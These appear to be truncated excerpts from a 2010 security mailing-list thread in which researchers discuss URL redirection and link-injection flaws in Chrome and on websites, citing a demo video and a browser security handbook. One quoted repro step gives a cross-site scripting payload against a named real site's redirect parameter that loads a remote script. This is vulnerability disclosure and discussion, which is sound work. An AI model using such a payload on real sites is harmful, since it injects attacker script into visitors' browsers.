Hi Berend-Jan
Please find the respective responses
> Repro steps:
> 1) Some websites do not sanitize user input correctly, such as the one
> in your example, which allows things like XSS:
> http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c
On Tue, Jan 05, 2010 at 10:49:07AM -0800, Michal Zalewski wrote:
> > Video: http://www.secniche.org/videos/google_chrome_link_inj.html
>
> You might find it informative to review the section of BSH on URL parsing:
> http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
Also, a
Aditya,
> Video: http://www.secniche.org/videos/google_chrome_link_inj.html
You might find it informative to review the section of BSH on URL parsing:
http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
There are many known quirks related to URL parsing; the practice of
cert
Hi
Recently with an outcome of OWASP RC1 top 10 exploited vulnerability
list, redirection issues have already made a mark in that. Even the
WASC has included the URL abusing as one of the stringent attacks.
Well, to be ethical in this regard, these are not the recent attacks but
are persisting fro